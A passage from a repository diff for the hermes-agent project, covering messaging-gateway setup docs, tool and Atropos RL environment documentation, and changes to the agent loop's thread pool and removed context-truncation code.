3. Configure in gateway:
```json
{
"platforms": {
"whatsapp": {
"enabled": true,
"extra": {
"bridge_script": "/path/to/bridge.js",
"bridge_port": 3000
}
}
}
}
```
## Configuration
There are **three ways** to configure the gateway (in order of precedence):
### 1. Environment Variables (`.env` file) - Recommended for Quick Setup
Add to your `~/.hermes/.env` file:
```bash
# =============================================================================
# MESSAGING PLATFORM TOKENS
# =============================================================================
# Telegram - get from @BotFather on Telegram
TELEGRAM_BOT_TOKEN=your_telegram_bot_token
TELEGRAM_ALLOWED_USERS=123456789,987654321 # Security: restrict to these user IDs
# Optional: Default channel for cron job delivery
TELEGRAM_HOME_CHANNEL=-1001234567890
TELEGRAM_HOME_CHANNEL_NAME="My Notes"
# Discord - get from Discord Developer Portal
DISCORD_BOT_TOKEN=your_discord_bot_token
DISCORD_ALLOWED_USERS=123456789012345678 # Security: restrict to these user IDs
# Optional: Default channel for cron job delivery
DISCORD_HOME_CHANNEL=123456789012345678
DISCORD_HOME_CHANNEL_NAME="#bot-updates"
# WhatsApp - requires Node.js bridge setup
WHATSAPP_ENABLED=true
# =============================================================================
# AGENT SETTINGS
# =============================================================================
# Max tool-calling iterations per conversation (default: 60)
HERMES_MAX_ITERATIONS=60
# Working directory for terminal commands (default: home ~)
MESSAGING_CWD=/home/myuser
# =============================================================================
# TOOL PROGRESS NOTIFICATIONS
# =============================================================================
# Show progress messages as agent uses tools
HERMES_TOOL_PROGRESS=true
# Mode: "new" (only when tool changes) or "all" (every tool call)
HERMES_TOOL_PROGRESS_MODE=new
# =============================================================================
# SESSION SETTINGS
# =============================================================================
# Reset sessions after N minutes of inactivity (default: 120)
SESSION_IDLE_MINUTES=120
# Daily reset hour in 24h format (default: 4 = 4am)
SESSION_RESET_HOUR=4
```
### 2. Gateway Config File (`~/.hermes/gateway.json`) - Full Control
For advanced configuration, create `~/.hermes/gateway.json`:
```json
{
"platforms": {
"telegram": {
"enabled": true,
"token": "your_telegram_token",
"home_channel": {
"platform": "telegram",
"chat_id": "-1001234567890",
"name": "My Notes"
}
},
"discord": {
"enabled": true,
"token": "your_discord_token",
"home_channel": {
"platform": "discord",
"chat_id": "123456789012345678",
"name": "#bot-updates"
}
}
},
"default_reset_policy": {
"mode": "both",
"at_hour": 4,
"idle_minutes": 120
},
"reset_by_platform": {
"discord": {
"mode": "idle",
"idle_minutes": 60
}
},
"always_log_local": true
}
```
## Platform-Specific Toolsets
Each platform has its own toolset for security:
| Platform | Toolset | Capabilities |
|----------|---------|--------------|
| CLI | `hermes-cli` | Full access (terminal, browser, etc.) |
| Telegram | `hermes-telegram` | Full tools including terminal |
| Discord | `hermes-discord` | Full tools including terminal |
| WhatsApp | `hermes-whatsapp` | Full tools including terminal |
## User Experience Features
### Typing Indicator
The gateway keeps the "typing..." indicator active throughout processing, refreshing every 4 seconds. This lets users know the bot is working even during long tool-calling sequences.
### Tool Progress Notifications
When `HERMES_TOOL_PROGRESS=true`, the bot sends status messages as it works:
```
💻 `ls -la`...
🔍 web_search...
📄 web_extract...
🎨 image_generate...
```
Terminal commands show the actual command (truncated to 50 chars). Other tools just show the tool name.
**Modes:**
- `new`: Only sends message when switching to a different tool (less spam)
- `all`: Sends message for every single tool call
### Working Directory
- **CLI (`hermes` command)**: Uses current directory where you run the command
- **Messaging**: Uses `MESSAGING_CWD` (default: home directory `~`)
This is intentional: CLI users are in a terminal and expect the agent to work in their current directory, while messaging users need a consistent starting location.
### Max Iterations
If the agent hits the max iteration limit while working, instead of a generic error, it asks the model to summarize what it found so far. This gives you a useful response even when the task couldn't be fully completed.
## Cron Job Delivery
When scheduling cron jobs, you can specify where the output should be delivered:
```
User: "Remind me to check the server in 30 minutes"
Agent uses: schedule_cronjob(
prompt="Check server status...",
schedule="30m",
deliver="origin" # Back to this chat
)
```
### Delivery Options
| Option | Description |
|--------|-------------|
| `"origin"` | Back to where the job was created |
| `"local"` | Save to local files only |
| `"telegram"` | Telegram home channel |
| `"discord"` | Discord home channel |
| `"telegram:123456"` | Specific Telegram chat |
## Dynamic Context Injection
The agent knows where it is via injected context:
```
## Current Session Context
**Source:** Telegram (group: Dev Team, ID: -1001234567890)
**Connected Platforms:** local, telegram, discord
**Home Channels:**
- telegram: My Notes (ID: -1001234567890)
- discord: #bot-updates (ID: 123456789012345678)
**Delivery options for scheduled tasks:**
- "origin" → Back to this chat (Dev Team)
- "local" → Save to local files only
- "telegram" → Home channel (My Notes)
- "discord" → Home channel (#bot-updates)
```
## CLI Commands
| Command | Description |
|---------|-------------|
| `/platforms` | Show gateway configuration and status |
| `--gateway` | Start the gateway (CLI flag) |
## Troubleshooting
### "python-telegram-bot not installed"
```bash
pip install python-telegram-bot>=20.0
```
### "discord.py not installed"
```bash
pip install discord.py>=2.0
```
### "No platforms connected"
1. Check your environment variables are set
2. Check your tokens are valid
3. Try `/platforms` to see configuration status
### Session not persisting
1. Check `~/.hermes/sessions/` exists
2. Check session policies aren't too aggressive
3. Verify no errors in gateway logs
## Adding a New Platform
To add a new messaging platform:
### 1. Create the adapter
Create `gateway/platforms/your_platform.py`:
```python
from gateway.platforms.base import BasePlatformAdapter, MessageEvent, SendResult
from gateway.config import Platform, PlatformConfig
class YourPlatformAdapter(BasePlatformAdapter):
def __init__(self, config: PlatformConfig):
super().__init__(config, Platform.YOUR_PLATFORM)
async def connect(self) -> bool:
# Connect to the platform
...
async def disconnect(self) -> None:
# Disconnect
...
async def send(self, chat_id: str, content: str, ...) -> SendResult:
# Send a message
...
async def get_chat_info(self, chat_id: str) -> Dict[str, Any]:
# Get chat information
...
```
### 2. Register the platform
Add to `gateway/config.py`:
```python
class Platform(Enum):
# ... existing ...
YOUR_PLATFORM = "your_platform"
```
### 3. Add to gateway runner
Update `gateway/run.py` `_create_adapter()`:
```python
elif platform == Platform.YOUR_PLATFORM:
from gateway.platforms.your_platform import YourPlatformAdapter
return YourPlatformAdapter(config)
```
### 4. Create a toolset (optional)
Add to `toolsets.py`:
```python
"hermes-your-platform": {
"description": "Your platform toolset",
"tools": [...],
"includes": []
}
```
### 5. Configure
Add environment variables to `.env`:
```bash
YOUR_PLATFORM_TOKEN=...
YOUR_PLATFORM_HOME_CHANNEL=...
```
## Service Management
### Linux (systemd)
```bash
# Install as user service
./scripts/hermes-gateway install
# Manage
systemctl --user start hermes-gateway
systemctl --user stop hermes-gateway
systemctl --user restart hermes-gateway
systemctl --user status hermes-gateway
# View logs
journalctl --user -u hermes-gateway -f
# Enable lingering (keeps running after logout)
sudo loginctl enable-linger $USER
```
### macOS (launchd)
```bash
# Install
./scripts/hermes-gateway install
# Manage
launchctl start ai.hermes.gateway
launchctl stop ai.hermes.gateway
# View logs
tail -f ~/.hermes/logs/gateway.log
```
### Manual (any platform)
```bash
# Run in foreground (for testing/debugging)
./scripts/hermes-gateway run
# Or via CLI (also foreground)
python cli.py --gateway
```
## Storage Locations
| Path | Purpose |
|------|---------|
| `~/.hermes/gateway.json` | Gateway configuration |
| `~/.hermes/sessions/sessions.json` | Session index |
| `~/.hermes/sessions/{id}.jsonl` | Conversation transcripts |
| `~/.hermes/cron/output/` | Cron job outputs |
| `~/.hermes/logs/gateway.log` | Gateway logs (macOS launchd) |

View File

@@ -1,159 +0,0 @@
# Tools
Tools are functions that extend the agent's capabilities. Each tool is defined with an OpenAI-compatible JSON schema and an async handler function.
## Tool Structure
Each tool module in `tools/` exports:
1. **Schema definitions** - OpenAI function-calling format
2. **Handler functions** - Async functions that execute the tool
```python
# Example: tools/web_tools.py
# Schema definition
WEB_SEARCH_SCHEMA = {
"type": "function",
"function": {
"name": "web_search",
"description": "Search the web for information",
"parameters": {
"type": "object",
"properties": {
"query": {"type": "string", "description": "Search query"}
},
"required": ["query"]
}
}
}
# Handler function
async def web_search(query: str) -> dict:
"""Execute web search and return results."""
# Implementation...
return {"results": [...]}
```
## Tool Categories
| Category | Module | Tools |
|----------|--------|-------|
| **Web** | `web_tools.py` | `web_search`, `web_extract`, `web_crawl` |
| **Terminal** | `terminal_tool.py` | `terminal` (local/docker/singularity/modal/ssh backends) |
| **Browser** | `browser_tool.py` | `browser_navigate`, `browser_click`, `browser_type`, etc. |
| **Vision** | `vision_tools.py` | `vision_analyze` |
| **Image Gen** | `image_generation_tool.py` | `image_generate` |
| **Reasoning** | `mixture_of_agents_tool.py` | `mixture_of_agents` |
| **Skills** | `skills_tool.py` | `skills_categories`, `skills_list`, `skill_view` |
## Tool Registration
Tools are registered in `model_tools.py`:
```python
# model_tools.py
TOOL_SCHEMAS = [
*WEB_TOOL_SCHEMAS,
*TERMINAL_TOOL_SCHEMAS,
*BROWSER_TOOL_SCHEMAS,
# ...
]
TOOL_HANDLERS = {
"web_search": web_search,
"terminal": terminal_tool,
"browser_navigate": browser_navigate,
# ...
}
```
## Toolsets
Tools are grouped into **toolsets** for logical organization (see `toolsets.py`):
```python
TOOLSETS = {
"web": {
"description": "Web search and content extraction",
"tools": ["web_search", "web_extract", "web_crawl"]
},
"terminal": {
"description": "Command execution",
"tools": ["terminal"]
},
# ...
}
```
## Adding a New Tool
1. Create handler function in `tools/your_tool.py`
2. Define JSON schema following OpenAI format
3. Register in `model_tools.py` (schemas and handlers)
4. Add to appropriate toolset in `toolsets.py`
5. Update `tools/__init__.py` exports
## Stateful Tools
Some tools maintain state across calls within a session:
- **Terminal**: Keeps container/sandbox running between commands
- **Browser**: Maintains browser session for multi-step navigation
State is managed per `task_id` and cleaned up automatically.
## Terminal Backends
The terminal tool supports multiple execution backends:
| Backend | Description | Use Case |
|---------|-------------|----------|
| `local` | Direct execution on host | Development, simple tasks |
| `ssh` | Remote execution via SSH | Sandboxing (agent can't modify its own code) |
| `docker` | Docker container | Isolation, reproducibility |
| `singularity` | Singularity/Apptainer | HPC clusters, rootless containers |
| `modal` | Modal cloud | Scalable cloud compute, GPUs |
Configure via environment variables or `cli-config.yaml`:
```yaml
# SSH backend example (in cli-config.yaml)
terminal:
env_type: "ssh"
ssh_host: "my-server.example.com"
ssh_user: "myuser"
ssh_key: "~/.ssh/id_rsa"
cwd: "/home/myuser/project"
```
The SSH backend uses ControlMaster for connection persistence, making subsequent commands fast.
## Skills Tools (Progressive Disclosure)
Skills are on-demand knowledge documents. They use **progressive disclosure** to minimize tokens:
```
Level 0: skills_categories() → ["mlops", "devops"] (~50 tokens)
Level 1: skills_list(category) → [{name, description}, ...] (~3k tokens)
Level 2: skill_view(name) → Full content + metadata (varies)
Level 3: skill_view(name, path) → Specific reference file (varies)
```
Skill directory structure:
```
skills/
└── mlops/
└── axolotl/
├── SKILL.md # Main instructions (required)
├── references/ # Additional docs
└── templates/ # Output formats, configs
```
SKILL.md uses YAML frontmatter:
```yaml
---
name: axolotl
description: Fine-tuning LLMs with Axolotl
tags: [Fine-Tuning, LoRA, DPO]
---
```

334
environments/README.md Normal file
View File

@@ -0,0 +1,334 @@
# Hermes-Agent Atropos Environments
This directory contains the integration layer between **hermes-agent's** tool-calling capabilities and the **Atropos** RL training framework. It provides everything needed to run agentic LLMs through multi-turn tool-calling loops, score their output with arbitrary reward functions, and feed results into Atropos for training or evaluation.
## Architecture Overview
```
Atropos Framework
┌───────────────────────┐
│ BaseEnv │ (atroposlib)
│ - Server management │
│ - Worker scheduling │
│ - Wandb logging │
│ - CLI (serve/process/ │
│ evaluate) │
└───────────┬───────────┘
│ inherits
┌───────────┴───────────┐
│ HermesAgentBaseEnv │ hermes_base_env.py
│ - Terminal backend │
│ - Tool resolution │
│ - Agent loop │
│ - ToolContext │
│ - Async patches │
└───────────┬───────────┘
│ inherits
┌─────────────────┼─────────────────┐
│ │ │
TerminalTestEnv HermesSweEnv TerminalBench2EvalEnv
(stack testing) (SWE training) (TB2 benchmark eval)
```
### Inheritance Chain
**BaseEnv** (from `atroposlib`) is the Atropos base class. It provides:
- Server management (OpenAI-compatible API servers, VLLM, SGLang)
- Worker scheduling for parallel rollouts
- Wandb integration for metrics and rollout logging
- CLI interface with three subcommands: `serve`, `process`, `evaluate`
- `evaluate_log()` for saving eval results to JSON + samples.jsonl
**HermesAgentBaseEnv** (`hermes_base_env.py`) extends BaseEnv with hermes-agent specifics:
- Sets `os.environ["TERMINAL_ENV"]` to configure the terminal backend (local, docker, modal, daytona, ssh, singularity)
- Resolves hermes-agent toolsets via `_resolve_tools_for_group()` (calls `get_tool_definitions()` which queries `tools/registry.py`)
- Implements `collect_trajectory()` which runs the full agent loop and computes rewards
- Supports two-phase operation (Phase 1: OpenAI server, Phase 2: VLLM ManagedServer)
- Applies monkey patches for async-safe tool operation at import time
Concrete environments inherit from `HermesAgentBaseEnv` and implement:
- `setup()` -- Load dataset, initialize state
- `get_next_item()` -- Return the next item for rollout
- `format_prompt()` -- Convert a dataset item into the user message
- `compute_reward()` -- Score the rollout using ToolContext
- `evaluate()` -- Periodic evaluation logic
## Core Components
### Agent Loop (`agent_loop.py`)
`HermesAgentLoop` is the reusable multi-turn agent engine. It runs the same pattern as hermes-agent's `run_agent.py`:
1. Send messages + tools to the API via `server.chat_completion()`
2. If the response contains `tool_calls`, execute each one via `handle_function_call()` (which delegates to `tools/registry.py`'s `dispatch()`)
3. Append tool results to the conversation and go back to step 1
4. If the response has no tool_calls, the agent is done
Tool calls are executed in a thread pool (`run_in_executor`) so backends that use `asyncio.run()` internally (Modal, Docker) don't deadlock inside Atropos's event loop.
Returns an `AgentResult` containing the full conversation history, turn count, reasoning content per turn, tool errors, and optional ManagedServer state (for Phase 2).
### Tool Context (`tool_context.py`)
`ToolContext` is a per-rollout handle that gives reward/verification functions direct access to **all** hermes-agent tools, scoped to the rollout's `task_id`. The same `task_id` means the terminal/browser session is the SAME one the model used during its rollout -- all state (files, processes, browser tabs) is preserved.
```python
async def compute_reward(self, item, result, ctx: ToolContext):
# Run tests in the model's terminal sandbox
test = ctx.terminal("pytest -v")
if test["exit_code"] == 0:
return 1.0
# Check if a file was created
content = ctx.read_file("/workspace/solution.py")
if content.get("content"):
return 0.5
# Download files locally for verification (binary-safe)
ctx.download_file("/remote/output.bin", "/local/output.bin")
return 0.0
```
Available methods:
- **Terminal**: `terminal(command, timeout)` -- run shell commands
- **Files**: `read_file(path)`, `write_file(path, content)`, `search(query, path)`
- **Transfers**: `upload_file()`, `upload_dir()`, `download_file()`, `download_dir()` -- binary-safe file transfers between host and sandbox
- **Web**: `web_search(query)`, `web_extract(urls)`
- **Browser**: `browser_navigate(url)`, `browser_snapshot()`
- **Generic**: `call_tool(name, args)` -- call any hermes-agent tool by name
- **Cleanup**: `cleanup()` -- release all resources (called automatically after `compute_reward`)
### Patches (`patches.py`)
**Problem**: Some hermes-agent tools use `asyncio.run()` internally (e.g., mini-swe-agent's Modal backend via SWE-ReX). This crashes when called from inside Atropos's event loop because `asyncio.run()` cannot be nested.
**Solution**: `patches.py` monkey-patches `SwerexModalEnvironment` to use a dedicated background thread (`_AsyncWorker`) with its own event loop. The calling code sees the same sync interface, but internally the async work happens on a separate thread that doesn't conflict with Atropos's loop.
What gets patched:
- `SwerexModalEnvironment.__init__` -- creates Modal deployment on a background thread
- `SwerexModalEnvironment.execute` -- runs commands on the same background thread
- `SwerexModalEnvironment.stop` -- stops deployment on the background thread
The patches are:
- **Idempotent** -- calling `apply_patches()` multiple times is safe
- **Transparent** -- same interface and behavior, only the internal async execution changes
- **Universal** -- works identically in normal CLI use (no running event loop)
Applied automatically at import time by `hermes_base_env.py`.
### Tool Call Parsers (`tool_call_parsers/`)
Client-side parsers that extract structured `tool_calls` from raw model output text. Used in **Phase 2** (VLLM server type) where ManagedServer's `/generate` endpoint returns raw text without tool call parsing.
Each parser is a standalone reimplementation of the corresponding VLLM parser's `extract_tool_calls()` logic. No VLLM dependency -- only standard library (`re`, `json`, `uuid`) and `openai` types.
Available parsers:
- `hermes` -- Hermes/ChatML `<tool_call>` XML format
- `mistral` -- Mistral `[TOOL_CALLS]` format
- `llama3_json` -- Llama 3 JSON tool calling
- `qwen` -- Qwen tool calling format
- `qwen3_coder` -- Qwen3 Coder format
- `deepseek_v3` -- DeepSeek V3 format
- `deepseek_v3_1` -- DeepSeek V3.1 format
- `kimi_k2` -- Kimi K2 format
- `longcat` -- Longcat format
- `glm45` / `glm47` -- GLM model formats
Usage:
```python
from environments.tool_call_parsers import get_parser
parser = get_parser("hermes")
content, tool_calls = parser.parse(raw_model_output)
```
In Phase 1 (OpenAI server type), these parsers are not needed -- the server handles tool call parsing natively.
## Two-Phase Operation
### Phase 1: OpenAI Server (Evaluation / SFT Data Generation)
Uses `server.chat_completion()` with `tools=` parameter. The server (VLLM, SGLang, OpenRouter, OpenAI) handles tool call parsing natively. Returns `ChatCompletion` objects with structured `tool_calls`.
- Good for: evaluation, SFT data generation, testing
- Run with: `serve` (with `run-api`), `process`, or `evaluate` subcommands
- Placeholder tokens are created for the Atropos pipeline
### Phase 2: VLLM ManagedServer (Full RL Training)
Uses ManagedServer for exact token IDs + logprobs via `/generate`. Client-side tool call parser (from `tool_call_parsers/`) reconstructs structured `tool_calls` from raw output.
- Good for: full RL training with GRPO/PPO
- Run with: `serve` subcommand
- Real tokens, masks, and logprobs flow through the pipeline
## Directory Structure
```
environments/
├── README.md # This file
├── __init__.py # Package exports
├── hermes_base_env.py # Abstract base (HermesAgentBaseEnv)
├── agent_loop.py # Multi-turn agent engine (HermesAgentLoop)
├── tool_context.py # Per-rollout tool access for reward functions
├── patches.py # Async-safety patches for Modal backend
├── tool_call_parsers/ # Phase 2 client-side parsers
│ ├── __init__.py # Registry + base class
│ ├── hermes_parser.py
│ ├── mistral_parser.py
│ ├── llama_parser.py
│ ├── qwen_parser.py
│ ├── qwen3_coder_parser.py
│ ├── deepseek_v3_parser.py
│ ├── deepseek_v3_1_parser.py
│ ├── kimi_k2_parser.py
│ ├── longcat_parser.py
│ ├── glm45_parser.py
│ └── glm47_parser.py
├── terminal_test_env/ # Stack validation environment
│ └── terminal_test_env.py
├── hermes_swe_env/ # SWE-bench style training environment
│ └── hermes_swe_env.py
└── benchmarks/ # Evaluation benchmarks
├── terminalbench_2/ # 89 terminal tasks, Modal sandboxes
│ └── terminalbench2_env.py
├── tblite/ # 100 calibrated tasks (fast TB2 proxy)
│ └── tblite_env.py
└── yc_bench/ # Long-horizon strategic benchmark
└── yc_bench_env.py
```
## Concrete Environments
### TerminalTestEnv (`terminal_test_env/`)
A self-contained environment with inline tasks (no external dataset needed) for validating the full stack end-to-end. Each task asks the model to create a file at a known path, and the verifier checks the content matches.
```bash
# Serve mode (needs run-api)
run-api
python environments/terminal_test_env/terminal_test_env.py serve
# Process mode (no run-api, saves to JSONL)
python environments/terminal_test_env/terminal_test_env.py process \
--env.data_path_to_save_groups terminal_test_output.jsonl
```
### HermesSweEnv (`hermes_swe_env/`)
SWE-bench style training environment. The model gets a coding task, uses terminal + file + web tools to solve it, and the reward function runs tests in the same Modal sandbox.
```bash
python environments/hermes_swe_env/hermes_swe_env.py serve \
--openai.model_name YourModel \
--env.dataset_name bigcode/humanevalpack \
--env.terminal_backend modal
```
### TerminalBench2EvalEnv (`benchmarks/terminalbench_2/`)
**Eval-only** environment for the Terminal-Bench 2.0 benchmark (89 tasks). Each task gets a pre-built Docker Hub image, a natural language instruction, and a test suite. The agent uses terminal + file tools to solve the task, then the test suite verifies correctness.
Follows the standard Atropos eval pattern (like GPQA, MMLU, etc.):
- Run via `evaluate` subcommand (no `run-api` needed)
- `setup()` loads the dataset, `evaluate()` runs all tasks
- `rollout_and_score_eval()` handles per-task agent loop + test verification
- Downloads verifier output locally for reliable reward checking (Harbor pattern)
```bash
# Run full benchmark
python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \
--openai.model_name anthropic/claude-opus-4.6
# Run subset of tasks
python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \
--openai.model_name anthropic/claude-opus-4.6 \
--env.task_filter fix-git,git-multibranch
# Skip specific tasks
python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \
--openai.model_name anthropic/claude-opus-4.6 \
--env.skip_tasks heavy-task,slow-task
```
## Creating a New Environment
### Training Environment
1. Create a new directory under `environments/`
2. Create your env file inheriting from `HermesAgentBaseEnv`
3. Implement the four abstract methods + `evaluate()`
```python
from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
class MyEnvConfig(HermesAgentEnvConfig):
pass # Add custom fields as needed
class MyEnv(HermesAgentBaseEnv):
name = "my-env"
env_config_cls = MyEnvConfig
@classmethod
def config_init(cls):
env_config = MyEnvConfig(
enabled_toolsets=["terminal", "file"],
terminal_backend="modal",
# ... other config
)
server_configs = [APIServerConfig(...)]
return env_config, server_configs
async def setup(self):
self.dataset = load_dataset(...)
self.iter = 0
async def get_next_item(self):
item = self.dataset[self.iter % len(self.dataset)]
self.iter += 1
return item
def format_prompt(self, item):
return item["instruction"]
async def compute_reward(self, item, result, ctx):
# ctx gives you full tool access to the rollout's sandbox
test = ctx.terminal("pytest -v")
return 1.0 if test["exit_code"] == 0 else 0.0
async def evaluate(self, *args, **kwargs):
# Periodic evaluation logic
...
if __name__ == "__main__":
MyEnv.cli()
```
### Eval-Only Environment (Benchmark)
For eval benchmarks, follow the pattern in `terminalbench2_env.py`:
1. Create under `environments/benchmarks/your-benchmark/`
2. Inherit from `HermesAgentBaseEnv`
3. Set eval-only config: `eval_handling=STOP_TRAIN`, `steps_per_eval=1`, `total_steps=1`
4. Stub the training methods (`collect_trajectories`, `score`)
5. Implement `rollout_and_score_eval()` and `evaluate()`
6. Run with `evaluate` subcommand
## Key Config Fields
| Field | Description | Default |
|-------|-------------|---------|
| `enabled_toolsets` | Which hermes toolsets to enable | `None` (all) |
| `disabled_toolsets` | Toolsets to disable | `None` |
| `distribution` | Probabilistic toolset distribution name | `None` |
| `max_agent_turns` | Max LLM calls per rollout | `30` |
| `agent_temperature` | Sampling temperature | `1.0` |
| `terminal_backend` | `local`, `docker`, `modal`, `daytona`, `ssh`, `singularity` | `local` |
| `system_prompt` | System message for the agent | `None` |
| `tool_call_parser` | Parser name for Phase 2 | `hermes` |
| `eval_handling` | `STOP_TRAIN`, `LIMIT_TRAIN`, `NONE` | `STOP_TRAIN` |

View File

@@ -4,15 +4,18 @@ Hermes-Agent Atropos Environments
Provides a layered integration between hermes-agent's tool-calling capabilities
and the Atropos RL training framework.
Layers:
Core layers:
- agent_loop: Reusable multi-turn agent loop with standard OpenAI-spec tool calling
- tool_context: Per-rollout tool access handle for reward/verification functions
- hermes_base_env: Abstract base environment (BaseEnv subclass) for Atropos
- tool_call_parsers: Client-side tool call parser registry for Phase 2 (VLLM /generate)
Concrete environments:
- terminal_test_env: Simple file-creation tasks for testing the stack
- hermes_swe_env: SWE-bench style tasks with Modal sandboxes
- terminal_test_env/: Simple file-creation tasks for testing the stack
- hermes_swe_env/: SWE-bench style tasks with Modal sandboxes
Benchmarks (eval-only):
- benchmarks/terminalbench_2/: Terminal-Bench 2.0 evaluation
"""
from environments.agent_loop import AgentResult, HermesAgentLoop

View File

@@ -15,6 +15,7 @@ import asyncio
import concurrent.futures
import json
import logging
import os
import uuid
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional, Set
@@ -22,9 +23,24 @@ from typing import Any, Dict, List, Optional, Set
from model_tools import handle_function_call
# Thread pool for running sync tool calls that internally use asyncio.run()
# (e.g., mini-swe-agent's modal/docker backends). Running them in a separate
# (e.g., mini-swe-agent's modal/docker/daytona backends). Running them in a separate
# thread gives them a clean event loop so they don't deadlock inside Atropos's loop.
_tool_executor = concurrent.futures.ThreadPoolExecutor(max_workers=8)
# Size must be large enough for concurrent eval tasks (e.g., 89 TB2 tasks all
# making tool calls). Too small = thread pool starvation, tasks queue for minutes.
# Resized at runtime by HermesAgentBaseEnv.__init__ via resize_tool_pool().
_tool_executor = concurrent.futures.ThreadPoolExecutor(max_workers=128)
def resize_tool_pool(max_workers: int):
"""
Replace the global tool executor with a new one of the given size.
Called by HermesAgentBaseEnv.__init__ based on config.tool_pool_size.
Safe to call before any tasks are submitted.
"""
global _tool_executor
_tool_executor = concurrent.futures.ThreadPoolExecutor(max_workers=max_workers)
logger.info("Tool thread pool resized to %d workers", max_workers)
logger = logging.getLogger(__name__)
@@ -57,12 +73,6 @@ class AgentResult:
# Tool errors encountered during the loop
tool_errors: List[ToolError] = field(default_factory=list)
# Tool-call metrics (for reward shaping + debugging)
tool_calls_attempted: int = 0 # Valid tool name + attempted dispatch
tool_calls_schema_valid: int = 0 # Arguments matched schema (no coercion)
tool_calls_executed_ok: int = 0 # Tool ran and returned no error
tool_calls_exec_error: int = 0 # Unknown tool / exception / tool returned error
def _extract_reasoning_from_message(message) -> Optional[str]:
"""
@@ -125,8 +135,7 @@ class HermesAgentLoop:
task_id: Optional[str] = None,
temperature: float = 1.0,
max_tokens: Optional[int] = None,
tool_handler=None,
max_context_tokens: Optional[int] = None,
extra_body: Optional[Dict[str, Any]] = None,
):
"""
Initialize the agent loop.
@@ -140,13 +149,9 @@ class HermesAgentLoop:
task_id: Unique ID for terminal/browser session isolation
temperature: Sampling temperature for generation
max_tokens: Max tokens per generation (None for server default)
tool_handler: Optional async callable(tool_name, args, task_id) -> str.
When provided, used INSTEAD of handle_function_call() for
tool dispatch. This allows sandbox backends (Modal, Nomad)
to route tool calls through their slot-based execution.
max_context_tokens: Maximum prompt tokens before truncation.
If None, no truncation is applied.
Recommended: set to max_model_len - max_tokens - 512 (safety margin).
extra_body: Extra parameters passed to the OpenAI client's create() call.
Used for OpenRouter provider preferences, transforms, etc.
e.g. {"provider": {"ignore": ["DeepInfra"]}}
"""
self.server = server
self.tool_schemas = tool_schemas
@@ -155,139 +160,7 @@ class HermesAgentLoop:
self.task_id = task_id or str(uuid.uuid4())
self.temperature = temperature
self.max_tokens = max_tokens
self.tool_handler = tool_handler
self.max_context_tokens = max_context_tokens
def _truncate_context(self, messages: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
"""
Truncate conversation history to fit within max_context_tokens.
Strategy:
- Keep system message (index 0) and initial user message (index 1) always
- Keep last 6 messages (recent context) always
- For everything in between, progressively truncate tool result content
- If still too long, drop oldest middle messages entirely
Uses rough char/4 token estimate (fast, no tokenizer needed).
"""
if self.max_context_tokens is None:
return messages
def estimate_tokens(msgs):
total = 0
for m in msgs:
content = m.get("content", "") or ""
total += len(content) // 4 + 10 # ~4 chars per token + overhead
if "tool_calls" in m:
total += 50 * len(m["tool_calls"]) # tool call overhead
return total
est = estimate_tokens(messages)
if est <= self.max_context_tokens:
return messages
# Phase 1: Truncate tool result content in middle messages
# Keep first 2 and last 6 messages untouched
protect_head = 2
protect_tail = max(0, min(6, len(messages) - protect_head))
middle_start = protect_head
middle_end = len(messages) - protect_tail
if middle_start < middle_end:
# Truncate tool results from oldest first
for i in range(middle_start, middle_end):
if messages[i].get("role") == "tool":
content = messages[i].get("content", "") or ""
if len(content) > 200:
messages[i] = dict(messages[i]) # copy
messages[i]["content"] = content[:100] + "\n...[truncated]...\n" + content[-50:]
est = estimate_tokens(messages)
if est <= self.max_context_tokens:
logger.debug("Context truncated (phase 1: tool results): %d tokens", est)
return messages
# Phase 2: Drop oldest middle messages entirely
while middle_start < middle_end and estimate_tokens(messages) > self.max_context_tokens:
# Remove the oldest middle message
# But keep assistant+tool pairs together
msg = messages[middle_start]
messages.pop(middle_start)
middle_end -= 1
# If we removed an assistant with tool_calls, also remove matching tool responses
if msg.get("role") == "assistant" and msg.get("tool_calls"):
tool_ids = {tc.get("id") or tc.get("tool_call_id", "") for tc in msg.get("tool_calls", []) if isinstance(tc, dict)}
# Remove tool responses for those IDs
i = middle_start
while i < middle_end:
if messages[i].get("role") == "tool" and messages[i].get("tool_call_id", "") in tool_ids:
messages.pop(i)
middle_end -= 1
else:
i += 1
est = estimate_tokens(messages)
logger.info("Context truncated (phase 2: dropped messages): %d estimated tokens, %d messages remaining", est, len(messages))
return messages
def _normalize_tool_args(self, tool_name: str, tool_args_raw: str) -> (Dict[str, Any], bool):
"""Normalize tool arguments into a dict.
Returns:
(args_dict, schema_valid)
schema_valid is True only when the arguments decode directly into a dict
(i.e. no double-decoding and no coercion/wrapping was needed).
This lets us keep the environment robust (never crash due to args format)
while still scoring down malformed tool-call argument formats.
"""
try:
decoded = json.loads(tool_args_raw)
except json.JSONDecodeError:
# Not valid JSON at all. Be robust: treat it as a plain string.
# (Some parsers/providers may pass through non-JSON strings.)
if tool_name == "terminal":
return {"command": tool_args_raw}, False
return {"input": tool_args_raw}, False
# Canonical case: decoded is already a dict
if isinstance(decoded, dict):
# For terminal tool, require a command key
if tool_name == "terminal":
cmd = decoded.get("command")
if isinstance(cmd, str) and cmd.strip():
return decoded, True
# Common alternate key
if isinstance(decoded.get("input"), str):
return {"command": decoded.get("input")}, False
return decoded, False
return decoded, True
# Common drift case: decoded is a JSON string of an object
if isinstance(decoded, str):
s = decoded.strip()
if (s.startswith("{") and s.endswith("}")) or (s.startswith("[") and s.endswith("]")):
try:
decoded2 = json.loads(s)
except json.JSONDecodeError:
decoded2 = None
if isinstance(decoded2, dict):
# Terminal tool: ensure command
if tool_name == "terminal" and isinstance(decoded2.get("command"), str):
return decoded2, False
return decoded2, False
# Plain string (not JSON) — coerce to expected shape
if tool_name == "terminal":
return {"command": decoded}, False
return {"input": decoded}, False
# Other JSON types (list/number/etc.) — wrap
if tool_name == "terminal":
return {"command": str(decoded)}, False
return {"input": decoded}, False
self.extra_body = extra_body
async def run(self, messages: List[Dict[str, Any]]) -> AgentResult:
"""
@@ -295,12 +168,7 @@ class HermesAgentLoop:
Args:
messages: Initial conversation messages (system + user).
This list is treated as the FULL trajectory and is
appended to as the conversation progresses.
Prompt truncation (to avoid context overflow) is applied
on a copy of this list per turn, so we do not lose
earlier messages for reward computation/debugging.
